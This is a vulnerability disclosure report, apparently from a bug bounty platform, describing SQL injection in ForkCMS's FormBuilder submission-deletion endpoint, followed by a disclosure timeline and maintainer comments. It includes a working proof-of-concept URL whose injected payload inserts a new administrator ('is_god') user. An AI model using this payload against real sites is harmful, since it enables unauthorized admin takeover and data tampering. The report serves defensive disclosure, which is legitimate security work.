SQL Injection in forkcms/forkcms
Valid
Reported on
Oct 30th 2021
Description
When deleting submissions which belong to a formular (made with module FormBuilder
), the parameter id[]
is vulnerable for SQL injection.
Proof of Concept
- Call the URL
http://127.0.0.1/private/en/form_builder/mass_data_action?form_id=2&token=aettnn67s&id[]=3);insert%20into%20users(email,password,is_god)%20values%20(%27attacker@example.com%27,%27$2y$10$qqJ9L1lIp38gKpqh1V3l1.EqLzj.brB0IqUPQ2XXcSjl6Dtcgq16C%27,1);--+&action=delete
- To test this URL successfully, you need a valid formular and some submissions to that formular. You might have to adjust the parameter
form_id
to another value. - After calling this URL, you have a new entry in
users
table.
Impact
The attacker can tamper data in the database as they want.
We have contacted a member of the
forkcms
team and are waiting to hear back
2 years ago
We have sent a
follow up to the
forkcms
team.
We will try again in 7 days.
2 years ago
We have sent a
second
follow up to the
forkcms
team.
We will try again in 10 days.
2 years ago
We have sent a
third and final
follow up to the
forkcms
team.
This report is now considered stale.
2 years ago
csrf token fails and blocks this
The disclosure bounty has been dropped
The fix bounty has been dropped
sorry, I was wrong, it is valid, I'll ask to reopen this one
to join this conversation